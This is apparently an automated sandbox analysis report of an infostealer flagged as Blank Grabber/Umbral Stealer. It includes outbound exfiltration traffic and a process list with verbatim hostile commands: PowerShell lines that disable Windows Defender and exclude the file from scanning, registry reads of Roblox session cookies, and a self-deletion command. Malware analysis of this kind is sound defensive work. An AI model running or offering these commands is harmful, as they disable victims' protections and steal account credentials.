2024-12-13 07:21:28 UTC	16355	OUT	Data Raw: 10 5e e6 65 35 b1 2f 1f 7f fe a7 e2 be 2b 7a af 75 f3 83 f3 8a d9 28 7c ba 2c 9d d0 d7 12 1b 14 6f ac fe ef 49 b9 5a 3c 24 14 94 f5 4f 82 e7 15 7f 91 4a 3d 87 ae 43 26 1a 95 4c 03 85 2d fb eb 16 9b 5e 97 37 bc 51 42 91 af 3f 6d a7 6f 5c 8b 8c e1 70 20 57 61 e3 62 3d 47 23 25 45 2f 4d 4a d4 07 5f a0 eb 1d 29 41 3b 53 4f c7 89 f6 c8 bd f4 a4 f7 f3 b6 6e 1d 0a ab 6c 78 f1 0e 09 38 cc d4 1f 25 58 26 b3 75 cc 37 25 a4 11 01 9c be 55 97 bd 7c a8 8d 5e 22 03 48 a7 13 82 d8 b1 f0 92 a3 1d e0 d7 f4 32 bc 5c 4e 2d 8b 1d ca 52 71 dd 34 1d 40 9e 9d f7 7a 9a 56 d8 02 d5 fb 90 ed df 0f aa 62 3d ca 9f d4 cd f4 bc 05 c3 56 fd ff f6 35 14 81 d2 dd 84 bf 37 3e 79 ca d3 fa ec 05 6f 9b 16 fc 56 27 69 b9 16 18 50 06 b1 b3 d3 f7 32 00 42 dc 1f a9 3b 96 ac 0f 1e d6 f2 04 5f ce Data Ascii: ^e5/+zu(\|,oIZ<$OJ=C&L-^7QB?mo\p Wab=G#%E/MJ_)A;SOnlx8%X&u7%U\|^"H2\N-Rq4@zVb=V57>yoV'iP2B;_
2024-12-13 07:21:28 UTC	16355	OUT	Data Raw: 7c a1 79 ee 0b 44 1b b8 c0 78 d5 d1 3d 7b ed 05 d5 d1 ff bc 6f e9 3a 2e 4a cc fc ca 6e 2c 89 01 dc 11 5e d2 3a bb ac 8c 9d 8b f0 04 a7 20 3d 37 97 de bc ee e8 d9 4c 3e f8 f7 aa 64 1a f7 cb 6a e9 1f cd 9a fb 8e dd 93 29 7e ad a6 73 7d 70 dc 4c 4d 60 1a 7c 07 4d 53 5f eb c3 7d 40 48 b3 06 09 21 3b 66 e0 e3 a8 28 cc d7 57 8a fd d0 46 23 ee 37 1d fa a2 a6 00 b2 df 50 3a 60 a6 89 78 c3 7d 25 60 95 dd dd 28 6c 64 83 a2 98 b6 61 3f ab f8 63 96 93 94 7c 74 2f c7 3e 14 f7 e8 5a c5 5d be d5 a3 91 1b 35 f6 28 7a da ea 80 b1 66 76 59 cf ef 47 b5 8b c3 63 2b 57 50 b9 07 93 b9 e9 23 47 0b 3d 19 d6 de 01 bb d3 3d 75 5f 0f da 5c b1 3f 8e b6 f0 8a ab ab 7b 4d 37 6a 34 48 7b 8a 35 b5 c7 53 83 35 b5 a4 ad 73 63 63 d8 00 5b af 5d 6b c7 f1 b1 cd 9f d4 e5 55 7a 07 f5 f7 ea c1 Data Ascii: \|yDx={o:.Jn,^: =7L>dj)~s}pLM`\|MS_}@H!;f(WF#7P:`x}%`(lda?c\|t/>Z]5(zfvYGc+WP#G==u_\?{M7j4H{5S5scc[]kUz
2024-12-13 07:21:28 UTC	16355	OUT	Data Raw: 5c 6b 46 1e 5c 85 75 eb 1b dc 5f e8 b3 36 bf 41 6b f6 19 21 dd b9 0c c3 72 cc b8 59 17 fa 78 3b e7 f1 71 ec 64 e8 13 e1 33 84 bc e6 25 3f aa bc 77 1a d1 4b 9e ed 2c 30 5f 4c 8e d1 a3 1c 7c f3 35 ef 89 e9 67 74 3e 7c c7 66 2b 7c aa 3c 2e c9 ef a6 c1 3e 4e 66 06 cb cd 8b 85 41 1b 74 30 ab b2 83 ad ef ea 47 e1 43 5f b3 5e 3e b5 1e 31 09 9f bf a2 da d9 88 60 17 b1 3c 13 a6 79 08 bc 07 d1 42 25 2f 36 3e 8c 6a 19 6a 8d c3 16 bd 3d 7a e7 ce 6c 6b 62 9c af cb 80 45 fc e2 0c f2 8f 62 29 6c 07 c5 a3 4f ef be 19 b5 9d 16 91 57 22 7d 51 8f 43 69 36 47 3d d8 e4 f7 5b 50 a1 2a 74 eb 19 8f 2b af e6 42 ee 27 6c 04 dc 4d 0d 2f 7a 59 3a 5e 59 4f d8 a6 60 af ed cc dd 0f 7a 9d 24 a1 ab 2f d5 61 d6 2d 3b b4 28 4f 9d 97 9f bf f3 dc a1 57 99 e6 1c d3 d0 de 34 5a f7 50 8a ae 28 Data Ascii: \kF\u_6Ak!rYx;qd3%?wK,0_L\|5gt>\|f+\|<.>NfAt0GC_^>1`<yB%/6>jj=zlkbEb)lOW"}QCi6G=[P*t+B'lM/zY:^YO`z$/a-;(OW4ZP(
2024-12-13 07:21:28 UTC	16355	OUT	Data Raw: cc 5e 43 c3 cf bc de a0 41 06 0b 33 27 ac 50 a6 ca 3f fd 83 14 3e 6a 09 b8 6d 6c 7a 39 03 3f 17 35 04 1b 52 9c ce 81 aa 30 13 62 f1 75 36 eb 6d 91 3b 03 c1 23 51 fa 70 ae 01 dc dc 3d 8f 60 dd 69 95 07 76 fe f0 78 44 bf 9d 3c 6e f8 71 04 e6 2e 3e 6a b7 bf b7 1d 85 5f 72 9c 77 c6 07 c8 30 cc 64 d6 95 ef 70 b9 d0 5d 89 fe a6 34 89 51 95 08 19 49 ed 6b 5b d0 e9 51 53 86 71 d4 a7 b9 86 28 eb 9e e0 f0 23 f9 ee b8 73 66 a1 2a c3 ef a8 c5 dd b3 5e 0d ef a0 22 88 fd 4a 40 80 71 d0 ec 91 95 7f 92 f6 05 0a 11 45 09 6e 73 16 6b 8c 4e 8c 86 f0 9f 41 11 a4 a0 12 ab 3c 86 6e 00 80 7d 49 d8 5e f5 41 6c b9 78 84 db 9c 4e ac 3c e7 03 53 2c 95 20 67 2c 27 1e 6e 07 1e 3c f9 74 ed 88 1d 43 39 39 20 7f b4 4b 3c 98 77 fc e9 f5 9c e8 ec c4 e5 3b 45 ad 8e 73 a0 b2 7b 87 ff 38 e6 Data Ascii: ^CA3'P?>jmlz9?5R0bu6m;#Qp=`ivxD<nq.>j_rw0dp]4QIk[QSq(#sf*^"J@qEnskNA<n}I^AlxN<S, g,'n<tC99 K<w;Es{8
2024-12-13 07:21:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-13 07:21:29 UTC	1005	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 07:21:29 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1734074491 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=71WWOKyFWi8dM%2BSRPpRycuDklRvFTxk3IaUr6xzNk%2BNznuC0KDWJE9GUwKgTjFjHgnwzhGaUxM%2BEqTfzdDuG3VmlOVUPmy0ueN8FvsStl7fQcXtd7TdqGBbVtF2j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Server: cloudflare CF-RAY: 8f14328fcb168c89-EWR {"message": "Unknown Webhook", "code": 10015}

Target ID:	0
Start time:	02:20:24
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\WE8zqotCFj.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\WE8zqotCFj.exe"
Imagebase:	0x23284ad0000
File size:	236'544 bytes
MD5 hash:	230F75B72D5021A921637929A63CFD79
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2001936283.000002328730B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2001936283.0000023286DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2001936283.0000023286DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2001936283.000002328726F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1349066156.0000023284AD2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1349066156.0000023284AD2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:20:28
Start date:	13/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	"attrib.exe" +h +s "C:\Users\user\Desktop\WE8zqotCFj.exe"
Imagebase:	0x7ff6d9d20000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:20:28
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:20:28
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:20:28
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:20:31
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff72d8c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:20:35
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:20:35
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:20:38
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:20:38
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:20:47
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:20:47
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:21:02
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"wmic.exe" os get Caption
Imagebase:	0x7ff608210000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:21:02
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:21:03
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"wmic.exe" computersystem get totalphysicalmemory
Imagebase:	0x7ff608210000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:21:03
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:21:04
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"wmic.exe" csproduct get uuid
Imagebase:	0x7ff608210000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:21:04
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:21:05
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:21:05
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:21:23
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	"wmic" path win32_VideoController get name
Imagebase:	0x7ff608210000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:21:23
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:21:29
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\WE8zqotCFj.exe" && pause
Imagebase:	0x7ff7cbe20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	02:21:29
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	02:21:29
Start date:	13/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost
Imagebase:	0x7ff603e90000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF887D18AC0 Relevance: 8.3, Strings: 6, Instructions: 780
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0#L, xrefs: 00007FF887D35B70
0XL, xrefs: 00007FF887D35BDB
0#L, xrefs: 00007FF887D35B59
x!L, xrefs: 00007FF887D35BA2
x!L, xrefs: 00007FF887D35B8B
0XL, xrefs: 00007FF887D35BBD

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID: 0#L$0#L$0XL$0XL$x!L$x!L
API String ID: 0-3527977318
Opcode ID: 0634f3c8dc435c02ed35032702c8029568b90113720734c2f8e181b9ce30f2e2
Instruction ID: 209dc2936cec0b3b422d877a6ab3e7be0e88386c82f18ad9f848ca139889cb25
Opcode Fuzzy Hash: 0634f3c8dc435c02ed35032702c8029568b90113720734c2f8e181b9ce30f2e2
Instruction Fuzzy Hash: D532A331B0894A4FEAD4EB2C9458B7977E1FF9935070902F6D44ECB2AAEE24EC45C741

Function 00007FF887EC70C2 Relevance: 7.5, Strings: 5, Instructions: 1268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/B, xrefs: 00007FF887EC757C
/B, xrefs: 00007FF887EC7862
/B, xrefs: 00007FF887EC7347
/B, xrefs: 00007FF887EC7619
/B, xrefs: 00007FF887EC7C7B

Memory Dump Source

Source File: 00000000.00000002.2105715147.00007FF887EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887eb0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID: /B$/B$/B$/B$/B
API String ID: 0-3379605428
Opcode ID: 30e32e4726799424cf36d3c238f2a16eb9c411d602f1226c2e311c90a32851b7
Instruction ID: 1653484191447657b5213899d8d247caa947eb4d2db28650c13f2cc5dc88178d
Opcode Fuzzy Hash: 30e32e4726799424cf36d3c238f2a16eb9c411d602f1226c2e311c90a32851b7
Instruction Fuzzy Hash: 42A25134A18A4A8FDB88EF28C4557A973B2FF59344F5405B9D41ECB296CF39E842CB41

Function 00007FF887D39A10 Relevance: 6.8, Strings: 3, Instructions: 3073COMMON

Download Yara Rule

Strings

}I_H, xrefs: 00007FF887D3A772
fI_H, xrefs: 00007FF887D3BE73
xI_L, xrefs: 00007FF887D3AC71

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID: fI_H$xI_L$}I_H
API String ID: 0-3166411991
Opcode ID: 4c31fc09ebd66398cecfa942e5a7e69d09b86c9daecfd2b1d05c6df51888bed6
Instruction ID: 157e260e8774e31338c89abca1a90839ad291edca13712a403ab0cabe7cfbcb6
Opcode Fuzzy Hash: 4c31fc09ebd66398cecfa942e5a7e69d09b86c9daecfd2b1d05c6df51888bed6
Instruction Fuzzy Hash: 93335170A5CB468FE7B8DB18C485BAA77E1FF98344F10467DD48E87295DE34A842CB42

Function 00007FF887CFC8B2 Relevance: 6.0, Strings: 4, Instructions: 1016
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8ML, xrefs: 00007FF887CFCECA
/B, xrefs: 00007FF887CFD04B
XE, xrefs: 00007FF887CFCDC2
8ML, xrefs: 00007FF887CFD1D8

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID: 8ML$8ML$XE$/B
API String ID: 0-2506625570
Opcode ID: f39e7224b0f4000782adbde3c8a57ae0ec173db6db5ce876fb756efb1a6cb2ce
Instruction ID: e338298f785e00f4b36f5a906964a1ecf38857a74530788c1aa6012692d83ec4
Opcode Fuzzy Hash: f39e7224b0f4000782adbde3c8a57ae0ec173db6db5ce876fb756efb1a6cb2ce
Instruction Fuzzy Hash: A572833060CB8A8FDB89DB6CC4617A977F2FF5A340F5442AAD449CB297CE64AC42C751

Function 00007FF887EB1B98 Relevance: 5.5, Strings: 1, Instructions: 4259COMMON

Download Yara Rule

Strings

/B, xrefs: 00007FF887EB62F0

Memory Dump Source

Source File: 00000000.00000002.2105715147.00007FF887EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887eb0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID: /B
API String ID: 0-1225004542
Opcode ID: 30c65837cef4ab67391061c0562fb6cce51fa4b8bdef3ba50f75c675fcdc21eb
Instruction ID: 012a1085e98d29f15fe887a964f83513bf62a0e85fe689610e9ccef859878bb3
Opcode Fuzzy Hash: 30c65837cef4ab67391061c0562fb6cce51fa4b8bdef3ba50f75c675fcdc21eb
Instruction Fuzzy Hash: C163047195C7C64FD3269F2484826A97FF0FF56744F0445BEC58E8B5A3DA38A806CB82

Function 00007FF887CF6888 Relevance: 4.8, Strings: 3, Instructions: 1016
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8ML, xrefs: 00007FF887CFF50A
2M_H, xrefs: 00007FF887CFF273
XE, xrefs: 00007FF887CFF2A1

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID: 2M_H$8ML$XE
API String ID: 0-29286821
Opcode ID: fe72033764b01c09de03fe8dc3cef0b9c8387811c93cd30f249be6a8fd2c7af1
Instruction ID: 173efe0353ce516faae8a93b183ca91fc305bc4b83528f83da428b5e601528c4
Opcode Fuzzy Hash: fe72033764b01c09de03fe8dc3cef0b9c8387811c93cd30f249be6a8fd2c7af1
Instruction Fuzzy Hash: 0A72C431A08A4E8FDB98EF28C454AAA77F2FF59340F1446B9D41DC7296DE34E846CB41

Function 00007FF887EB22C0 Relevance: 4.1, Strings: 3, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p[D, xrefs: 00007FF887EB2520
p[D, xrefs: 00007FF887EB2559
r6B, xrefs: 00007FF887EB2370

Memory Dump Source

Source File: 00000000.00000002.2105715147.00007FF887EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887eb0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID: p[D$p[D$r6B
API String ID: 0-2559667013
Opcode ID: 9f841a3184e405000f8a3dffac8f0b3b444c0523028dfff54362459c1ea0607a
Instruction ID: bbad9955d7b72c8db6d692af023bf1dd22ed4077b11f2d93fab17f011858b7af
Opcode Fuzzy Hash: 9f841a3184e405000f8a3dffac8f0b3b444c0523028dfff54362459c1ea0607a
Instruction Fuzzy Hash: AEA1B630A5CA8A4FE786DB3884647797BE1FF56780F4444BAD14EC71A3DD2CA882C742

Function 00007FF887EC8BF2 Relevance: 4.0, Strings: 3, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0_^, xrefs: 00007FF887EC8C2A
0_^, xrefs: 00007FF887EC8BF2
0_^, xrefs: 00007FF887EC8C6A

Memory Dump Source

Source File: 00000000.00000002.2105715147.00007FF887EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887eb0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID: 0_^$0_^$0_^
API String ID: 0-2752339766
Opcode ID: be4d06dc237ef8b1cdf68a3dd32f52f5dd43472239c65c054cd00b0660f0c12a
Instruction ID: c3e676c99d5921fe12d186a55aa9ecd09c1538c1e25c56197368ed1d93a77383
Opcode Fuzzy Hash: be4d06dc237ef8b1cdf68a3dd32f52f5dd43472239c65c054cd00b0660f0c12a
Instruction Fuzzy Hash: B0712C66EAEAD71FF346962C48951B87BB1FFA665471D01B7C048CB1D3EA1C6807C381

Function 00007FF887CFC9D3 Relevance: 3.1, Strings: 2, Instructions: 608
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8ML, xrefs: 00007FF887CFCECA
XE, xrefs: 00007FF887CFCDC2

Memory Dump Source

Source File: 00000000.00000002.2092778914.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cf0000_WE8zqotCFj.jbxd

Similarity

API ID:
String ID: 8ML$XE
API String ID: 0-3339832896
Opcode ID: e79ba9e16db151aa38db5ab28881cd939f6f5f5fea09d062023c12b96a656194
Instruction ID: abe2613c743d340dece062d4a992ef65c89103d66184b61e4931b90cdf68fcb4
